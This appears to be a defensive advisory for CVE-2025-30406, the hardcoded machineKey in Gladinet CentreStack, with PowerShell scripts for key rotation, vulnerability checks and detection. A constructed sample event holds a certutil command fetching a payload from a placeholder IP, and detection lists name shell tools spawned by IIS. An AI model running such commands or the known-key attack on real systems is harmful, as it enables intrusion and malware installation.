CVE-2025-30406

9.0 CRITICAL CISA KEV

📋 TL;DR

Gladinet CentreStack ships with a hardcoded ASP.NET machineKey in its portal web.config, and the same value is present in every default installation. Anyone who knows that key can sign (and, where encryption is on, encrypt) a malicious ViewState that the portal deserializes server-side, which yields unauthenticated remote code execution in the context of the portal's IIS application pool. All CentreStack deployments through version 16.1.10296.56315 are vulnerable unless they are patched or the key has been manually replaced.

💻 Affected Systems

Products:
  • Gladinet CentreStack
Versions: through 16.1.10296.56315
Operating Systems: Windows
Default Config Vulnerable: ⚠️ Yes
Notes: All default installations are vulnerable; portal\web.config ships with the same hardcoded machineKey on every install, so the "secret" the attack depends on is effectively public.

📦 What is this software?

Gladinet CentreStack is a Windows-hosted file server access and sharing product: it exposes existing file shares through a web portal, mapped drives and mobile clients. The portal is an ASP.NET application served by IIS, which is why its integrity depends on the ASP.NET machineKey configured in portal\web.config.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise with administrative privileges, data exfiltration, ransomware deployment, and lateral movement within the network.

🟠

Likely Case

Remote code execution leading to data theft, installation of backdoors, or cryptomining malware on vulnerable servers.

🟢

If Mitigated

Segmentation, a low-privilege application pool identity and monitoring shrink the blast radius, but unauthenticated code execution on a server that fronts your file shares remains a serious outcome even when mitigated.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Actively exploited in the wild since March 2025. The only prerequisite is knowledge of the machineKey; because vulnerable versions hardcode the same key in every install, anyone who has read one vulnerable portal\web.config meets it. No account on the portal is needed, just HTTP access to an .aspx page.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 16.4.10315.56368

Vendor Advisory: https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf

Restart Required: Yes

Instructions:

1. Download CentreStack 16.4.10315.56368 or later from the official vendor site.
2. Back up the current installation and configuration, including portal\web.config.
3. Run the installer to upgrade.
4. Restart the CentreStack services and IIS; ASP.NET only reads machineKey when the application starts.
5. Confirm that the machineKey in portal\web.config now carries a value unique to this server rather than the one that shipped in vulnerable builds. In a multi-node deployment every node serving the portal must carry the same new key, so copy it rather than letting each node generate its own.

🔧 Temporary Workarounds

Manual machineKey replacement

windows

Replace the hardcoded machineKey in portal\web.config so that the publicly known value no longer signs ViewState for this server. This removes the attacker's prerequisite but is not a patch: the deserialization path stays in place and the server should still be upgraded.

1. Open portal\web.config under the CentreStack install directory.
2. Locate the <machineKey> element inside <system.web>.
3. Either replace validationKey and decryptionKey with freshly generated random values (IIS Manager's Machine Key feature can generate them; never copy a key from another install or from an example found online), or delete the element so that ASP.NET autogenerates a per-application-pool key. Deletion only works on a single-node deployment: every node serving the portal must share one key, so in a farm generate one key and copy it to every node.
4. Restart IIS (iisreset) or the CentreStack services; ASP.NET reads machineKey only at application start. Expect signed-in portal users to be logged out, since forms-authentication cookies and ViewState issued under the old key stop validating.
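The rotation described above, scripted so it can be repeated on every node of a deployment. This is an added example, not Gladinet's tooling: it assumes the web.config path you pass in (the vendor's default install directory is not stated here), that the portal runs under IIS so that iisreset is the right restart, and that the portal targets .NET 4.x, where HMACSHA256/AES are valid machineKey algorithms.

```powershell
# Added example, not vendor code: replace the shared machineKey in CentreStack's
# portal\web.config with a freshly generated one, then restart IIS. Run elevated.
# Assumptions: the -WebConfig path is yours to supply; iisreset is the right restart.
param(
    [Parameter(Mandatory = $true)]
    [string]$WebConfig,      # e.g. D:\CentreStack\portal\web.config (assumed path)
    [switch]$NoRestart
)

# Cryptographically random key material, upper-case hex as ASP.NET expects it.
function New-HexKey([int]$ByteCount) {
    $bytes = New-Object byte[] $ByteCount
    [System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($bytes)
    return ([System.BitConverter]::ToString($bytes)) -replace '-', ''
}

if (-not (Test-Path -LiteralPath $WebConfig)) { throw "web.config not found: $WebConfig" }
$fullPath = (Resolve-Path -LiteralPath $WebConfig).ProviderPath

# Keep a copy: a malformed web.config takes the whole portal down.
$backup = "$fullPath.bak-$(Get-Date -Format 'yyyyMMdd-HHmmss')"
Copy-Item -LiteralPath $fullPath -Destination $backup

[xml]$xml = Get-Content -LiteralPath $fullPath -Raw
$systemWeb = $xml.SelectSingleNode('/configuration/system.web')
if (-not $systemWeb) { throw "no <system.web> section in $fullPath" }

# Reuse the existing element if present, otherwise create one.
$mk = $systemWeb.SelectSingleNode('machineKey')
if (-not $mk) {
    $mk = $xml.CreateElement('machineKey')
    [void]$systemWeb.AppendChild($mk)
}

# 64-byte validationKey for HMACSHA256 and 32-byte decryptionKey for AES-256:
# the same sizes IIS Manager's "Generate Keys" produces.
$mk.SetAttribute('validationKey', (New-HexKey 64))
$mk.SetAttribute('decryptionKey', (New-HexKey 32))
$mk.SetAttribute('validation', 'HMACSHA256')
$mk.SetAttribute('decryption', 'AES')
$xml.Save($fullPath)

Write-Host "machineKey rotated in $fullPath (backup: $backup)"
Write-Host "Farm deployments: copy this <machineKey> to every node; do not re-run the script there."

# The new key is only read when the application restarts.
if (-not $NoRestart) { iisreset /restart }
```

Rotating the key does not remove the deserialization sink; it only takes away the attacker's known signing key, so the upgrade is still required. Keep the backup file out of any web-served directory, since it contains the old key and the rest of the configuration.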

🧯 If You Can't Patch

  • Network segmentation: keep the portal off the internet and restrict which internal hosts and users can reach it; the exploit needs nothing but HTTP access to a portal .aspx page.
  • WAF or reverse proxy: once the key is known a WAF cannot tell a forged ViewState from a legitimate one, so generic "deserialization" signatures are not a control to rely on. What it can do is restrict source IPs, and log and alert on POSTs to the portal that carry an unusually large __VIEWSTATE form field.

🔍 How to Verify

Check if Vulnerable:

Check the CentreStack version (admin portal or Programs and Features) and inspect the <machineKey> element in portal\web.config. A version at or below 16.1.10296.56315 with the shipped machineKey still in place is vulnerable; a version that old with a locally generated key is mitigated but still unpatched.

Check Version:

Read the version from the CentreStack admin dashboard or the installation directory, and compare it as a four-part version number rather than as text, so that a hypothetical later minor version with two digits is not ordered before 16.4.x.

Verify Fix Applied:

Verify both conditions: the version is 16.4.10315.56368 or later, and the machineKey in portal\web.config carries a value unique to this install rather than the one that shipped in vulnerable builds. The version shows the fixed code is running; the key shows the shared secret is gone.
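The three checks above combined into one verdict (patched, mitigated, or vulnerable), as an added example rather than anything from the page or the vendor. It assumes the web.config path you pass in; that CentreStack registers in Programs and Features with a DisplayName containing "CentreStack" (only used when -Version is not given, and unverified here); and that -DefaultValidationKey, if you pass it, is the hardcoded value published for the vulnerable builds.

```powershell
# Added example, not vendor code: is this host patched, mitigated, or still exposed?
# Assumptions: -WebConfig path; the Programs and Features DisplayName pattern used by
# Get-InstalledVersion; -DefaultValidationKey is the known hardcoded key if supplied.
param(
    [Parameter(Mandatory = $true)][string]$WebConfig,
    [string]$Version,                 # as shown in the admin dashboard; looked up if omitted
    [string]$DefaultValidationKey     # optional: the vendor default key, for an exact match
)

$FixedVersion = [version]'16.4.10315.56368'

function Get-InstalledVersion {
    $keys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
            'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    Get-ItemProperty -Path $keys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName -like '*CentreStack*' } |   # assumed naming
        Select-Object -First 1 -ExpandProperty DisplayVersion
}

function Get-MachineKeyState([string]$Path) {
    [xml]$xml = Get-Content -LiteralPath $Path -Raw
    $mk = $xml.SelectSingleNode('/configuration/system.web/machineKey')
    if (-not $mk) { return @{ Explicit = $false; ValidationKey = $null } }
    $vk = $mk.GetAttribute('validationKey')
    # "AutoGenerate..." means ASP.NET derives a per-app-pool key: not a shared secret.
    return @{ Explicit = [bool]($vk -and $vk -notlike 'AutoGenerate*'); ValidationKey = $vk }
}

if (-not $Version) { $Version = Get-InstalledVersion }
if (-not $Version) { throw 'Could not determine the CentreStack version; pass -Version.' }

# Compare as System.Version, not as a string: "16.10" sorts before "16.4" as text.
$installed = [version]$Version
$key = Get-MachineKeyState $WebConfig

$verdict = if ($installed -ge $FixedVersion -and $DefaultValidationKey -and
               $key.ValidationKey -eq $DefaultValidationKey) {
    'Patched, but still carrying the vendor default key: rotate it'
} elseif ($installed -ge $FixedVersion) {
    'Patched'
} elseif (-not $key.Explicit) {
    'Mitigated (unpatched, key autogenerated by ASP.NET)'
} elseif ($DefaultValidationKey -and $key.ValidationKey -ne $DefaultValidationKey) {
    'Mitigated (unpatched, key rotated)'
} elseif ($DefaultValidationKey) {
    'Vulnerable (unpatched, vendor default key in place)'
} else {
    'Likely vulnerable (unpatched, static key present; pass -DefaultValidationKey to confirm)'
}

[pscustomobject]@{
    Version      = $installed
    FixedVersion = $FixedVersion
    ExplicitKey  = $key.Explicit
    Verdict      = $verdict
}
```

Without -DefaultValidationKey the script cannot distinguish the vendor's hardcoded key from a key you generated yourself, which is why the unconfirmed branch says "likely": an explicit static key on an unpatched host is the default state, so treat it as vulnerable until you prove otherwise.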

📡 Detection & Monitoring

Log Indicators:

  • ViewState verification failures from the ASP.NET provider in the Windows Application log (Event ID 1316, "Viewstate verification failed"). These appear after the key has been rotated or patched, when attackers keep replaying payloads signed with the old key; on an unpatched server a forged ViewState verifies cleanly, so there is no 1316 to find and the process and network indicators below matter more.
  • Child processes such as cmd.exe, powershell.exe, mshta.exe or certutil.exe whose parent is the IIS worker process (w3wp.exe) for the CentreStack portal application pool
  • Unexpected outbound connections initiated by w3wp.exe or by processes it spawned

Network Indicators:

  • HTTP POSTs to portal .aspx pages carrying an unusually large __VIEWSTATE form field (the serialized payload travels in that field; IIS logs do not record request bodies, so enable the cs-bytes W3C log field or capture request size at a reverse proxy or WAF)
  • Outbound connections from the CentreStack server to unfamiliar external IPs, especially shortly after such a POST

SIEM Query:

(source="*Sysmon*" EventCode=1 ParentImage="*\\w3wp.exe" Image IN ("*\\cmd.exe", "*\\powershell.exe", "*\\pwsh.exe", "*\\mshta.exe", "*\\rundll32.exe", "*\\certutil.exe"))
OR (source="WinEventLog:Application" SourceName="ASP.NET*" EventCode=1316)

Splunk-style pseudo-query; the field names follow the Windows and Sysmon add-on defaults and need mapping to your SIEM's schema. The first clause catches post-exploitation (the IIS worker process spawning a shell), the second catches replays of the old key after you have rotated or patched.
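The first clause of that query as runnable detection logic, so it can be tested before it goes into the SIEM. This is an added example, not from the page or the vendor: the two Sysmon Event ID 1 records are constructed here for the demo (the app pool name "portal" and the timestamps are made up), and the -Live switch assumes Sysmon is installed with process-creation logging.

```powershell
# Added example, not vendor code: flag the IIS worker process spawning a shell, the
# post-exploitation pattern for a ViewState RCE, over Sysmon Event ID 1 records.
# Sample events below are constructed; -Live reads the real Sysmon log instead.
param([switch]$Live)

$SuspiciousChildren = 'cmd.exe', 'powershell.exe', 'pwsh.exe', 'mshta.exe',
                      'rundll32.exe', 'certutil.exe', 'wscript.exe', 'cscript.exe'

# Sysmon stores its fields as <Data Name="...">text</Data>; turn them into a hashtable.
function ConvertFrom-SysmonEvent([string]$EventXml) {
    [xml]$doc = $EventXml
    $fields = @{}
    foreach ($d in $doc.Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
    $fields['TimeCreated'] = $doc.Event.System.TimeCreated.SystemTime
    return $fields
}

# Last path component, tolerant of both separators and of a missing field.
function Get-Leaf([string]$Path) {
    if (-not $Path) { return '' }
    return ($Path -split '[\\/]')[-1]
}

function Test-W3wpSpawn([hashtable]$E) {
    $parent = Get-Leaf $E['ParentImage']
    $child  = Get-Leaf $E['Image']
    # -ieq and -contains are case-insensitive in PowerShell.
    return ($parent -ieq 'w3wp.exe') -and ($SuspiciousChildren -contains $child)
}

function Find-Suspicious([string[]]$EventXmls) {
    foreach ($x in $EventXmls) {
        $e = ConvertFrom-SysmonEvent $x
        if (Test-W3wpSpawn $e) {
            [pscustomobject]@{
                Time        = $e['TimeCreated']
                User        = $e['User']
                Parent      = $e['ParentImage']
                CommandLine = $e['CommandLine']
            }
        }
    }
}

if ($Live) {
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -ErrorAction Stop |
              ForEach-Object { $_.ToXml() }
} else {
    # Constructed sample: one hit (shell under w3wp.exe) and one benign record.
    $ns = 'http://schemas.microsoft.com/win/2004/08/events/event'
    $events = @(
@"
<Event xmlns="$ns"><System><EventID>1</EventID><TimeCreated SystemTime="2025-04-03T10:15:22.000Z"/></System>
<EventData><Data Name="Image">C:\Windows\System32\cmd.exe</Data>
<Data Name="CommandLine">cmd.exe /c whoami &amp; certutil -urlcache -f http://203.0.113.7/a.exe a.exe</Data>
<Data Name="User">IIS APPPOOL\portal</Data>
<Data Name="ParentImage">C:\Windows\System32\inetsrv\w3wp.exe</Data></EventData></Event>
"@,
@"
<Event xmlns="$ns"><System><EventID>1</EventID><TimeCreated SystemTime="2025-04-03T10:16:05.000Z"/></System>
<EventData><Data Name="Image">C:\Windows\System32\conhost.exe</Data>
<Data Name="CommandLine">\??\C:\Windows\system32\conhost.exe 0x4</Data>
<Data Name="User">NT AUTHORITY\SYSTEM</Data>
<Data Name="ParentImage">C:\Windows\System32\svchost.exe</Data></EventData></Event>
"@
    )
}

Find-Suspicious $events | Format-Table -AutoSize
```

Run without arguments the script reports the first constructed record only; the conhost.exe record is ignored because its parent is not w3wp.exe. Tune the child list to what your portal's application pool legitimately launches (it should be close to nothing), and treat any hit on an unpatched CentreStack host as an incident rather than an alert to triage later.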
